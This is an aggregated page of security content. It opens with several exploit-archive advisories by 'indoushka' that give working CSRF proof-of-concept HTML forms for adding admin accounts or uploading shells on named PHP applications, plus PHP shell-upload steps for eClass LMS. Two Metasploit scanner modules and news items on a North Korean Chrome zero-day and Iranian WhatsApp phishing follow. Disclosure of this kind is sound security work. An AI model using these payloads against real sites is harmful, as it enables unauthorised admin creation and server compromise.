File Management System version 1.0 suffers from a cross site request forgery vulnerability.

    =============================================================================================================================================| # Title     : File Management System 1.0 CSRF Add Admin Vulnerability                                                                     || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.campcodes.com/downloads/file-management-system-in-php-mysql-source-code/?wpdmdl=7992&refresh=66bba3bd946da1723573181                           |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Line 1 : Set your target.[+] Save As poc.html[+] Payload :  <form action="http://127.0.0.1/filemanagement/Private_Dashboard/create_Admin.php" method="POST">  <div class="modal-dialog" role="document">    <div class="modal-content">      <div class="modal-header text-center">        <h4 class="modal-title w-100 font-weight-bold"><i class="fas fa-user-plus"></i> Add Admin</h4>        <button type="button" class="close" data-dismiss="modal" aria-label="Close">          <span aria-hidden="true">&times;</span>        </button>      </div>      <div class="modal-body mx-3">           <div class="md-form mb-5">          <input type="hidden" id="orangeForm-name" name="status" value = "Admin" class="form-control validate">        </div>        <div class="md-form mb-5">          <i class="fas fa-user prefix grey-text"></i>          <input type="text" id="orangeForm-name" name="name" class="form-control validate" required="">          <label data-error="wrong" data-success="right" for="orangeForm-name">Your name</label>        </div>        <div class="md-form mb-5">          <i class="fas fa-envelope prefix grey-text"></i>          <input type="email" id="orangeForm-email" name="admin_user" class="form-control validate" required="">          <label data-error="wrong" data-success="right" for="orangeForm-email">Your email</label>        </div>        <div class="md-form mb-4">          <i class="fas fa-lock prefix grey-text"></i>          <input type="password" id="orangeForm-pass" name="admin_password" class="form-control validate" required="">          <label data-error="wrong" data-success="right" for="orangeForm-pass">Your password</label>        </div>      </div>      <div class="modal-footer d-flex justify-content-center">        <button class="btn btn-info" name="reg">Sign up</button>    Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

File Management System 1.0 Cross Site Request Forgery

Faculty Evaluation System version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : Faculty Evaluation System 1.0 CSRF Add Admin Vulnerability                                                                  |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.2 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/php/14710/faulty-evaluation-system-using-phpcodeigniter-source-code.html                     |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Line 35 : Set your target.

[+] Save As poc.html

[+] Payload :

  <!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>User Registration</title>  
</head>  
<body>

    <h2>User Registration</h2>  
    <form id="userForm" enctype="multipart/form-data">  
        <label for="email">User Name:</label>  
        <input type="email" id="email" name="email" required><br><br>

        <label for="password">Password:</label>  
        <input type="password" id="password" name="password" required><br><br>

        <div class="form-group">  
      <label for="" class="control-label">Avatar</label>  
      <div class="custom-file">  
              <input type="file" class="custom-file-input rounded-circle" id="customFile" name="img" onchange="displayImg(this,$(this))">  
              <label class="custom-file-label" for="customFile">Choose file</label>  
            </div>  
    </div>

        <input type="button" value="Save User" onclick="saveUser()">  
    </form>

    <script>  
        function saveUser() {  
            var form = document.getElementById('userForm');  
            var formData = new FormData(form);

            var xhr = new XMLHttpRequest();  
            xhr.open("POST", "http://127.0.0.1/eval/ajax.php?action=save_user", true);

            xhr.onload = function () {  
                if (xhr.status === 200) {  
                    alert('User saved successfully');  
                } else {  
                    alert('An error occurred while saving the user');  
                }  
            };

            xhr.send(formData);  
        }  
    </script>

</body>  
</html>

[+] Shell Path : http://127.0.0.1/eval/assets/uploads/

    Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Faculty Evaluation System 1.0 Cross Site Request Forgery

eClass LMS version 6.2.0 suffers from a remote shell upload vulnerability.

    ====================================================================================================================================| # Title     : eClass LMS v6.2.0 shell upload Vulnerability                                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://codecanyon.net/item/eclass-learning-management-system/25613271                                             |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] TAIF learning script contain arbitrary file upload[+] registered user can upload .php files in profile picture section without any security[+] profile link : localhost/demo/public/profile/show/[+] profile link : /demo/public/profile/show/[+] edit profile photo and upload php files and inspect element your php direction[+] uploaded file direction :local host /demo/public/images/user_img/16067501901.php <---- random id[+] just right click the photo and use inspect element you will have your directionGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

eClass LMS 6.2.0 Shell Upload

Free Hospital Management System for Small Practices version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : Vaidya-Mitra v 1.0 CSRF Vulnerability  
                                                                   |  
| # Author    : indoushka  
                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1  
(64 bits)                                                            |  
| # Vendor    :  
https://www.sourcecodester.com/php/16720/free-hospital-management-system-small-practices.html  
                             |

=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following HTML code add new admin.

[+] Go to the line 9. Set the target site link Save changes and apply .

[+] infected file : vm/create-account.php.

[+] save code as poc.html

[+] payload :

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width,  
initial-scale=1.0">  
    <title>Create Account</title>  
</head>  
<body>  
    <form action="http://127.0.0.1/vm/create-account.php" method="POST">  
        <label for="newemail">Email:</label>  
        <input type="email" id="newemail" name="newemail" required>  
        <br>

        <label for="tele">Telephone:</label>  
        <input type="text" id="tele" name="tele" required>  
        <br>

        <label for="newpassword">Password:</label>  
        <input type="password" id="newpassword" name="newpassword"  
required>  
        <br>

        <label for="cpassword">Confirm Password:</label>  
        <input type="password" id="cpassword" name="cpassword" required>  
        <br>

        <button type="submit">Create Account</button>  
    </form>  
</body>  
</html>

Greetings to  
:============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr  
|

==========================================================================

Free Hospital Management System For Small Practices 1.0 CSRF

A list of topics we covered in the week of August 26 to September 1 of 2024

August 30, 2024 - Iranian spies posing as technical support agents contacted targeted individuals in Israel, Palestine, Iran, the UK, and the US on WhatsApp

August 29, 2024 - A Google search ad for Canva is highly misleading and walks users into a trap.

August 29, 2024 - Telegram CEO Pavel Durov has been arrested in France which raises a lot of questions about the reasons behind the arrest.

August 28, 2024 - Ransomware gangs love sensitive data from healthcare and support organizations to increase their leverage on the victims

August 27, 2024 - Scammers are increasingly using toll fees as a lure in smishing attacks with the aim of grabbing victims' personal details and credit card information.

 A week in security (August 26 &#8211; September 1) 

Checks if an HTTP proxy is open. False positive are avoided verifying the HTTP return code and matching a pattern. The CONNECT method is verified only the return code. HTTP headers are shown regarding the use of proxy or load balancer.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::HttpClient  include Msf::Auxiliary::Scanner  include Msf::Auxiliary::WmapScanServer  include Msf::Auxiliary::Report  def initialize(info = {})    super(update_info(info,      'Name'        => 'HTTP Open Proxy Detection',      'Description' => %q{        Checks if an HTTP proxy is open. False positive are avoided        verifying the HTTP return code and matching a pattern.        The CONNECT method is verified only the return code.        HTTP headers are shown regarding the use of proxy or load balancer.      },      'References'  =>        [          ['URL', 'https://en.wikipedia.org/wiki/Open_proxy'],          ['URL', 'https://svn.nmap.org/nmap/scripts/http-open-proxy.nse'],        ],      'Author'      => 'Matteo Cantoni <goony[at]nothink.org>',      'License'     => MSF_LICENSE    ))    register_options(      [        Opt::RPORT(8080),        OptBool.new('MULTIPORTS', [ false, 'Multiple ports will be used: 80, 443, 1080, 3128, 8000, 8080, 8123', false ]),        OptBool.new('VERIFYCONNECT', [ false, 'Enable CONNECT HTTP method check', false ]),        OptString.new('CHECKURL', [ true, 'The web site to test via alleged web proxy', 'http://www.google.com' ]),        OptString.new('VALIDCODES', [ true, "Valid HTTP code for a successfully request", '200,302' ]),        OptString.new('VALIDPATTERN', [ true, "Valid pattern match (case-sensitive into the headers and HTML body) for a successfully request", '<TITLE>302 Moved</TITLE>' ]),      ])    register_wmap_options({      'OrderID' => 1,      'Require' => {},    })  end  def run_host(target_host)    check_url = datastore['CHECKURL']    if datastore['VERIFYCONNECT']      target_method = 'CONNECT'      # CONNECT doesn't need <scheme> but need port      check_url = check_url.gsub(/[http:\/\/|https:\/\/]/, '')      if check_url !~ /:443$/        check_url = check_url + ":443"      end    else      target_method = 'GET'      # GET only http request      check_url = check_url.gsub(/https:\/\//, '')      if check_url !~ /^http:\/\//i        check_url = 'http://' + check_url      end    end    target_ports = []    if datastore['MULTIPORTS']      target_ports = [ 80, 443, 1080, 3128, 8000, 8080, 8123 ]    else      target_ports.push(datastore['RPORT'].to_i)    end    target_proxy_headers = [ 'Forwarded', 'Front-End-Https', 'Max-Forwards', 'Via', 'X-Cache', 'X-Cache-Lookup', 'X-Client-IP', 'X-Forwarded-For', 'X-Forwarded-Host' ]    target_ports.each do |target_port|      verify_target(target_host,target_port,target_method,check_url,target_proxy_headers)    end  end  def verify_target(target_host,target_port,target_method,check_url,target_proxy_headers)    vprint_status("#{peer} - Sending a web request... [#{target_method}][#{check_url}]")    datastore['RPORT'] = target_port    begin      res = send_request_cgi(        'uri'     => check_url,        'method'  => target_method,        'version' => '1.1'      )      return if not res      vprint_status("#{peer} - Returns with '#{res.code}' status code [#{target_method}][#{check_url}]")      valid_codes = datastore['VALIDCODES'].split(/,/)      target_proxy_headers_results = []      target_proxy_headers.each do |proxy_header|        if (res.headers.to_s.match(/#{proxy_header}: (.*)/))          proxy_header_value = $1          # Ok...I don't like it but works...          target_proxy_headers_results.push("\n                          |_ #{proxy_header}: #{proxy_header_value}")        end      end      if target_proxy_headers_results.any?        proxy_headers = target_proxy_headers_results.join()      end      if datastore['VERIFYCONNECT']        # Verifying CONNECT we check only the return code        if valid_codes.include?(res.code.to_s)          print_good("#{peer} - Potentially open proxy [#{res.code}][#{target_method}]#{proxy_headers}")          report_note(            :host   => target_host,            :port   => target_port,            :method => target_method,            :proto  => 'tcp',            :sname  => (ssl ? 'https' : 'http'),            :type   => 'OPEN HTTP PROXY',            :data   => 'Open http proxy (CONNECT)'          )        end      else        # Verify return code && (headers.pattern or body.pattern)        if valid_codes.include?(res.code.to_s) && (res.headers.include?(datastore['VALIDPATTERN']) || res.body.include?(datastore['VALIDPATTERN']))          print_good("#{peer} - Potentially open proxy [#{res.code}][#{target_method}]#{proxy_headers}")          report_note(            :host   => target_host,            :port   => target_port,            :method => target_method,            :proto  => 'tcp',            :sname  => (ssl ? 'https' : 'http'),            :type   => 'OPEN HTTP PROXY',            :data   => 'Open http proxy (GET)'          )        end      end    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE => e      vprint_error("#{peer} - The port '#{target_port}' is unreachable!")      return nil    end  endend

HTTP Open Proxy Detection

This Metasploit module enumerates wireless access points through Chromecast.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::HttpClient  include Msf::Auxiliary::Scanner  def initialize(info = {})    super(update_info(info,      'Name' => 'Chromecast Wifi Enumeration',      'Description' => %q{        This module enumerates wireless access points through Chromecast.      },      'Author' => ['wvu'],      'References' => [        ['URL', 'http://www.google.com/intl/en/chrome/devices/chromecast/index.html'] # vendor website      ],      'License' => MSF_LICENSE    ))    register_options([      Opt::RPORT(8008)    ])  end  def run_host(ip)    res = scan    return unless res && res.code == 200    waps_table = Rex::Text::Table.new(      'Header' => "Wireless Access Points from #{ip}",      'Columns' => [        'BSSID',        'PWR',        'ENC',        'CIPHER',        'AUTH',        'ESSID'      ],      'SortIndex' => -1    )    res.get_json_document.each do |wap|      waps_table << [        wap['bssid'],        wap['signal_level'],        enc(wap),        cipher(wap),        auth(wap),        wap['ssid'] + (wap['wpa_id'] ? ' (*)' : '')      ]    end    unless waps_table.rows.empty?      print_line(waps_table.to_s)      report_note(        :host => ip,        :port => rport,        :proto => 'tcp',        :type => 'chromecast.wifi',        :data => waps_table.to_csv      )    end  end  def scan    send_request_raw(      'method' => 'POST',      'uri' => '/setup/scan_wifi',      'agent' => Rex::Text.rand_text_english(rand(42) + 1)    )    send_request_raw(      'method' => 'GET',      'uri' => '/setup/scan_results',      'agent' => Rex::Text.rand_text_english(rand(42) + 1)    )  end  def enc(wap)    case wap['wpa_auth']    when 1      'OPN'    when 2      'WEP'    when 5      'WPA'    when 0, 7      'WPA2'    else      wap['wpa_auth']    end  end  def cipher(wap)    case wap['wpa_cipher']    when 1      ''    when 2      'WEP'    when 3      'TKIP'    when 4      'CCMP'    else      wap['wpa_cipher']    end  end  def auth(wap)    case wap['wpa_auth']    when 0      'MGT'    when 5, 7      'PSK'    else      ''    end  endend

Chromecast Wifi Enumeration

A recently patched security flaw in Google Chrome and other Chromium web browsers was exploited as a zero-day by North Korean actors in a campaign designed to deliver the FudModule rootkit.
The development is indicative of the persistent efforts made by the nation-state adversary, which had made a habit of incorporating rafts of Windows zero-day exploits into its arsenal in recent months.

Rootkit / Threat Intelligence

A recently patched security flaw in Google Chrome and other Chromium web browsers was exploited as a zero-day by North Korean actors in a campaign designed to deliver the FudModule rootkit.

The development is indicative of the persistent efforts made by the nation-state adversary, which had made a habit of incorporating rafts of Windows zero-day exploits into its arsenal in recent months.

Microsoft, which detected the activity on August 19, 2024, attributed it to a threat actor it tracks as Citrine Sleet (formerly DEV-0139 and DEV-1222), which is also known as AppleJeus, Labyrinth Chollima, Nickel Academy, and UNC4736. It's assessed to be a sub-cluster within the Lazarus Group (aka Diamond Sleet and Hidden Cobra).

It's worth mentioning that the use of the AppleJeus malware has been previously also attributed by Kaspersky to another Lazarus subgroup called BlueNoroff (aka APT38, Nickel Gladstone, and Stardust Chollima), indicative of the infrastructure and toolset sharing between these threat actors.

"Citrine Sleet is based in North Korea and primarily targets financial institutions, particularly organizations and individuals managing cryptocurrency, for financial gain," the Microsoft Threat Intelligence team said.

"As part of its social engineering tactics, Citrine Sleet has conducted extensive reconnaissance of the cryptocurrency industry and individuals associated with it."

The attack chains typically involve setting up fake websites masquerading as legitimate cryptocurrency trading platforms that seek to trick users into installing weaponized cryptocurrency wallets or trading applications that facilitate the theft of digital assets.

The observed zero-day exploit attack by Citrine Sleet involved the exploitation of CVE-2024-7971, a high-severity type confusion vulnerability in the V8 JavaScript and WebAssembly engine that could allow threat actors to gain remote code execution (RCE) in the sandboxed Chromium renderer process. It was patched by Google as part of updates released last week.

As previously stated by The Hacker News, CVE-2024-7971 is the third actively exploited type confusion bug in V8 that Google resolved this year after CVE-2024-4947 and CVE-2024-5274.

It's currently not clear how widespread these attacks were or who was targeted, but the victims are said to have been directed to a malicious website named voyagorclub\[.\]space likely through social engineering techniques, thereby triggering an exploit for CVE-2024-7971.

The RCE exploit, for its part, paves the way for the retrieval of shellcode containing a Windows sandbox escape exploit (CVE-2024-38106) and the FudModule rootkit, which is used to establish admin-to-kernel access to Windows-based systems to allow read/write primitive functions and perform \[direct kernel object manipulation\]."

CVE-2024-38106, a Windows kernel privilege escalation bug, is one of the six actively exploited security flaws that Microsoft remediated as part of its August 2024 Patch Tuesday update. That said, the Citrine Sleet-linked exploitation of the flaw has been found to have occurred after the fix was released.

"This may suggest a 'bug collision,' where the same vulnerability is independently discovered by separate threat actors, or knowledge of the vulnerability was shared by one vulnerability researcher to multiple actors," Microsoft said.

CVE-2024-7971 is also the third vulnerability that North Korean threat actors have leveraged this year to drop the FudModule rootkit, following CVE-2024-21338 and CVE-2024-38193, both of which are privilege escalation flaws in the built-in Windows drivers and were fixed by Microsoft in February and August.

"The CVE-2024-7971 exploit chain relies on multiple components to compromise a target, and this attack chain fails if any of these components are blocked, including CVE-2024-38106," the company said.

"Zero-day exploits necessitate not only keeping systems up to date, but also security solutions that provide unified visibility across the cyberattack chain to detect and block post-compromise attacker tools and malicious activity following exploitation."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

North Korean Hackers Deploy FudModule Rootkit via Chrome Zero-Day Exploit

Plus: China-linked hackers infiltrate US internet providers, authorities crack down on a major piracy operation, and a ransomware gang claims attacks during the Paris Olympics.

Pavel Durov, the founder and CEO of the communication app Telegram, was arrested in France on Saturday as part of an investigation into his and Telegram’s alleged failure to moderate illegal content on the platform, among other allegations. After being detained for four days, he was charged on Wednesday evening, barred from leaving France, and released on the condition of posting a €5 million ($5.5 million) bail and reporting to a French police station twice a week. The Paris prosecutor's office said on Wednesday that Durov faces complicity charges related to child sexual abuse material and drug trafficking, as well charges for importing cryptology without prior declaration, and a “near-total absence” of cooperation with French authorities.

“Nudify” deepfake websites that generate images of people's naked bodies without their consent have been incorporating mainstream single sign-on authentication systems into their websites, a WIRED investigation found. Discord and Apple are terminating some developers’ accounts over this usage.

Microsoft published research on Wednesday about a new multistage backdoor that the notorious Iranian hacking group APT 33 or Peach Sandstorm has been using to target victims in sectors including satellite, communications equipment, and oil and gas. And Google researchers found that suspected Russian hackers compromised Mongolian government websites between November 2023 and July 2024 and then infected vulnerable users who visited the sites with malware. Crucially, the attackers compromised targets using exploits that were identical or very similar to hacking tools created by the commercial spyware vendors NSO Group and Intellexa.

And there's more. Each week, we round up the security and privacy news we didn’t cover in depth ourselves. Click the headlines to read the full stories. And stay safe out there.

**CIA Says It Provided Key Intelligence to Thwart Terrorist Plot Against Vienna Taylor Swift Concert**

The US Central Intelligence Agency provided Austrian law enforcement with crucial intelligence that led to the arrest of suspects who were allegedly plotting to attack Taylor Swift concerts in Austria at the beginning of the month. All three of the singer's planned concerts were canceled at Vienna’s Ernst Happel Stadium because of the threat. CIA deputy director David Cohen said at the Insa intelligence conference on Wednesday, “Within my agency and others there were people who thought that was a really good day for Langley and not just the Swifties in my workforce.”

The central suspect is a 19-year-old Austrian of North Macedonian background who reportedly made a full confession. Austrian law enforcement also arrested an 18-year-old and a 17-year-old in relation to the plot. Cops also reportedly interrogated a 15-year-old. The plot was allegedly inspired by the Islamic State and included plans to attack fans outside the venue with knives or explosives. Earlier this month, Austrian interior minister Gerhard Karner said foreign intelligence agencies contributed to the investigation because Austrian law bars text message surveillance.

“They were plotting to kill a huge number, tens of thousands of people at this concert, including I am sure many Americans, and were quite advanced in this,” the CIA's Cohen said at the conference. “The Austrians were able to make those arrests because the agency and our partners in the intelligence community provided them information about what this ISIS-connected group was planning to do.”

**Hackers Are Compromising ISPs With Credential-Stealing Malware**

Hackers who may be backed by the Chinese government have been exploiting a recently patched vulnerability in network management virtualization software known as Versa Director to compromise at least four US-based internet service providers and steal authentication credentials used by their customers. Researchers from Lumen's Black Lotus Labs, said on Thursday that the attacks began as early as June 12 and are likely still going on. Hackers exploit the Versa Director vulnerability to install remote access malware that Lumen dubbed allow “VersaMem.”

“Given the severity of the vulnerability, the implications of compromised Versa Director systems, and the time that has now elapsed to allow Versa customers to patch the vulnerability, Black Lotus Labs felt it was appropriate to release this information at this time,” the researchers wrote in a blog post. “Lumen Technologies shared threat intelligence to warn appropriate US government agencies of the emerging risks that could impact our nation’s strategic assets.”

**Vietnamese Law Enforcement Takedown “Fmovies” Piracy Ring**

The movie studio coalition known as the Alliance for Creativity and Entertainment said on Thursday that Hanoi police have investigated and taken down the Vietnam-based pirate streaming service Fmovies and its affiliates. The working group said it collaborated with law enforcement and provided information about Fmovies, which it called “the largest pirate streaming operation in the world.” The group added that Fmovies and its affiliate sites—which included bflixz, flixtorz, movies7, myflixer, and aniwave—had more than 6.7 billion visits between January 2023 and June 2024. The law enforcement operation also led to the takedown of video hosting provider Vidsrc.to and its affiliates because these services were allegedly “operated by the same suspects.” Hanoi police have arrested two men in connection with the case.

**Brain Cipher Ransomware Gang Claims Attacks During the Olympics**

Following a digital attack against dozens of French museums during the Olympic Games earlier this month, the ransomware gang known as Brain Cipher has claimed responsibility for the hacks and is threatening to leak 300 GB of stolen data from the museums. Le Grand Palais and dozens of other French national museums and cultural organizations are overseen by Réunion des Musées Nationaux – Grand Palais and reportedly all use some shared digital infrastructure, which the attackers targeted.

Taylor Swift Concert Terror Plot Was Thwarted by Key CIA Tip

Iranian spies posing as technical support agents contacted targeted individuals in Israel, Palestine, Iran, the UK, and the US on WhatsApp

An Iranian state-sponsored group often referred to as Iran’s Islamic Revolutionary Guard Corps (IRGC) is making headlines again this season as Meta disclosed that the cybercriminals targeted WhatsApp users in Israel, Palestine, Iran, the UK, and the US.

Other names for this group—depending on the vendor– are APT42, Storm-2035, Charming Kitten, Damselfly, Mint Sandstorm, TA453, and Yellow Garuda.

Earlier the group was linked to disinformation campaigns around the US elections in a Microsoft threat report, Google research findings, and when OpenAI banned accounts linked to an Iranian influence operation.

It is no surprise that nations like Iran have an interest in influencing elections in the US and the targets in this campaign also included staff members of President Joe Biden and former President Donald Trump.

Meta blocked a small cluster of WhatsApp accounts posing as support agents for tech companies. These accounts used social engineering against political and diplomatic officials, and other public figures. This type of attacks is called spear phishing, as it involves highly targeted phishing attempts.

The fake accounts linked to the Iranian group posed as technical support for AOL, Google, Yahoo, and Microsoft.

The APT in APT42 stands for advanced persistent threat (APT), which signifies a prolonged, aimed attack on a specific target with the intention to compromise their system and gain information from or about that target.

This is exactly the kind of group that you will see involved in spear phishing attacks, that target individuals to collect information about them, or manipulate them into revealing information about their occupation, or compromise their devices and accounts so they can spy on them.

There is no evidence that this group managed to compromise any accounts and Meta praises the targets that reported these suspicious messages using the in-app reporting tools, so WhatsApp could launch an investigation and disrupt the campaign.

Phishers often use technical support accounts in phishing attempts because people tend to trust them with information if they happen to be a customer of the company that the “support agent” claims to represent.

WhatsApp users should remain on the lookout for unsolicited contacts and messages.

*   If a message looks suspicious, comes unsolicited, or sounds too good to be true, don’t tap, share, or forward it. Don’t become part of a misinformation campaign.
*   Always inspect links and attached files thoroughly before opening them. Ask the known sender through other means what it’s for.
*   Do not engage in conversations when you are not sure who the sender is. Even the fact that you respond to them will tell them this is a way to reach you and might lead to more attempts.

**We don’t just report on threats – we help protect your social media**

Cybersecurity risks should never spread beyond a headline. Protect your social media accounts by using Cyrus, powered by Malwarebytes.

Tag

#google